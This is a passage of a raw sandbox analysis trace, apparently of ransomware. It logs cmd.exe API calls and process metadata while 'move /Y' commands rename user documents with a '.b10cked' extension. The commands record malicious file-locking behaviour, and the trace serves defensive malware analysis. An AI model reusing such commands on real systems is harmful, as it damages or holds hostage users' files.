hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e81c, lpData=0x16e820, lpcbData=0x16e818*=0x1000 | out: lpType=0x16e81c*=0x0, lpData=0x16e820*=0x9, lpcbData=0x16e818*=0x1000) returned 0x2 [0234.773] RegCloseKey (hKey=0x40) returned 0x0 [0234.773] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.773] srand (_Seed=0x5b8863c2) [0234.773] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked\"" [0234.773] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked\"" [0234.773] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.773] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x271908, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.773] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.774] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.774] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.774] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.774] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.774] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.774] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.774] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.774] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.774] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.774] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.774] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.774] GetEnvironmentStringsW () returned 0x2722f8* [0234.774] FreeEnvironmentStringsW (penv=0x2722f8) returned 1 [0234.774] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.774] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.774] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.774] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.774] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.774] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.774] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.774] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.774] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.774] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.774] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f5e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.774] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f5e0, lpFilePart=0x16f5dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f5dc*="Desktop") returned 0x18 [0234.774] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.774] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f35c | out: lpFindFileData=0x16f35c) returned 0x270038 [0234.775] FindClose (in: hFindFile=0x270038 | out: hFindFile=0x270038) returned 1 [0234.775] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f35c | out: lpFindFileData=0x16f35c) returned 0x270038 [0234.775] FindClose (in: hFindFile=0x270038 | out: hFindFile=0x270038) returned 1 [0234.775] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f35c | out: lpFindFileData=0x16f35c) returned 0x270038 [0234.775] FindClose (in: hFindFile=0x270038 | out: hFindFile=0x270038) returned 1 [0234.775] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.775] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.775] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.775] GetEnvironmentStringsW () returned 0x272b18* [0234.775] FreeEnvironmentStringsW (penv=0x272b18) returned 1 [0234.775] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.776] GetConsoleOutputCP () returned 0x1b5 [0234.776] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.776] GetUserDefaultLCID () returned 0x409 [0234.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f720, cchData=128 | out: lpLCData="0") returned 2 [0234.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f720, cchData=128 | out: lpLCData="0") returned 2 [0234.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f720, cchData=128 | out: lpLCData="1") returned 2 [0234.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.776] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.777] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.777] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.777] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.777] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.777] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.777] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.777] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.777] GetConsoleTitleW (in: lpConsoleTitle=0x2608f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.778] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.778] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.778] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.778] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.778] _wcsicmp (_String1="move", _String2=")") returned 68 [0234.778] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0234.778] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0234.778] _wcsicmp (_String1="IF", _String2="move") returned -4 [0234.778] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0234.778] _wcsicmp (_String1="REM", _String2="move") returned 5 [0234.778] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0234.781] GetConsoleTitleW (in: lpConsoleTitle=0x16f418, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.781] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0234.781] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0234.781] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0234.781] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0234.781] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0234.781] _wcsicmp (_String1="move", _String2="CD") returned 10 [0234.782] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0234.782] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0234.782] _wcsicmp (_String1="move", _String2="REN") returned -5 [0234.782] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0234.782] _wcsicmp (_String1="move", _String2="SET") returned -6 [0234.782] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0234.782] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0234.782] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0234.782] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0234.782] _wcsicmp (_String1="move", _String2="MD") returned 11 [0234.782] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0234.782] _wcsicmp (_String1="move", _String2="RD") returned -5 [0234.782] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0234.782] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0234.782] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0234.782] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0234.782] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0234.782] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0234.782] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0234.782] _wcsicmp (_String1="move", _String2="VER") returned -9 [0234.782] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0234.782] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0234.782] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0234.782] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0234.782] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0234.782] _wcsicmp (_String1="move", _String2="START") returned -6 [0234.782] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0234.782] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0234.782] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0234.783] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.783] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.783] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f1d4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f1cc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f1cc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0234.784] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0234.785] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0234.785] _wcsicmp (_String1="MXJQIS~1.OTS", _String2=".") returned 63 [0234.785] _wcsicmp (_String1="MXJQIS~1.OTS", _String2="..") returned 63 [0234.785] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\mxjqis~1.ots")) returned 0x20 [0234.785] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x271e80 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.785] SetErrorMode (uMode=0x0) returned 0x0 [0234.785] SetErrorMode (uMode=0x1) returned 0x0 [0234.785] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS", nBufferLength=0x104, lpBuffer=0x16eb5c, lpFilePart=0x16eb44 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS", lpFilePart=0x16eb44*="MXJQIS~1.OTS") returned 0x2d [0234.785] SetErrorMode (uMode=0x0) returned 0x1 [0234.785] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew")) returned 0x12 [0234.785] _wcsicmp (_String1="MXJQIS~1.OTS", _String2=".") returned 63 [0234.785] _wcsicmp (_String1="MXJQIS~1.OTS", _String2="..") returned 63 [0234.785] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\mxjqis~1.ots")) returned 0x20 [0234.786] SetErrorMode (uMode=0x0) returned 0x0 [0234.786] SetErrorMode (uMode=0x1) returned 0x0 [0234.786] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS", nBufferLength=0x104, lpBuffer=0x16efd8, lpFilePart=0x16ed70 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS", lpFilePart=0x16ed70*="MXJQIS~1.OTS") returned 0x2d [0234.786] SetErrorMode (uMode=0x0) returned 0x1 [0234.786] SetErrorMode (uMode=0x0) returned 0x0 [0234.786] SetErrorMode (uMode=0x1) returned 0x0 [0234.786] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked", nBufferLength=0x104, lpBuffer=0x16f1e0, lpFilePart=0x16ed70 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked", lpFilePart=0x16ed70*="mXjqIsUDXYxFeYxzgw.ots.b10cked") returned 0x3f [0234.786] SetErrorMode (uMode=0x0) returned 0x1 [0234.786] SetLastError (dwErrCode=0x0) [0234.786] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\mxjqisudxyxfeyxzgw.ots.b10cked")) returned 0xffffffff [0234.786] GetLastError () returned 0x2 [0234.786] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x16e6ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e6ec) returned 0x260ed0 [0234.786] FindNextFileW (in: hFindFile=0x260ed0, lpFindFileData=0x16e6ec | out: lpFindFileData=0x16e6ec) returned 0 [0234.787] GetLastError () returned 0x12 [0234.787] FindClose (in: hFindFile=0x260ed0 | out: hFindFile=0x260ed0) returned 1 [0234.787] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x271c20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x271c20) returned 0x260ed0 [0234.788] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked", nBufferLength=0x104, lpBuffer=0x16e984, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked", lpFilePart=0x0) returned 0x3f [0234.788] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots", nBufferLength=0x104, lpBuffer=0x16e984, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots", lpFilePart=0x0) returned 0x37 [0234.788] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\mxjqisudxyxfeyxzgw.ots")) returned 0x20 [0234.788] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\mxjqisudxyxfeyxzgw.ots"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\mxjqisudxyxfeyxzgw.ots.b10cked"), dwFlags=0x3) returned 1 [0234.788] FindClose (in: hFindFile=0x260ed0 | out: hFindFile=0x260ed0) returned 1 [0234.788] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16e938 | out: _Buffer=" 1") returned 9 [0234.788] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.788] GetFileType (hFile=0x7) returned 0x2 [0235.351] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.351] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16e8c4 | out: lpMode=0x16e8c4) returned 1 [0235.351] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.351] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e8f8 | out: lpConsoleScreenBufferInfo=0x16e8f8) returned 1 [0235.351] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0235.352] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x16e938 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0235.352] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16e91c, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x16e91c*=0x1a) returned 1 [0235.352] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.352] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.352] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.352] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.352] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.352] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.353] SetConsoleInputExeNameW () returned 0x1 [0235.353] GetConsoleOutputCP () returned 0x1b5 [0235.353] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.353] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.353] exit (_Code=0) Process: id = "630" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xb08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\oR2F.csv.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35028 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35029 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35030 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35031 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 35032 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35033 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35034 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35035 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35036 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 35037 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35186 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35187 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35188 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35189 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 35190 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 35191 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35192 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35193 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35194 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35195 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35196 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35197 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35198 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35199 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 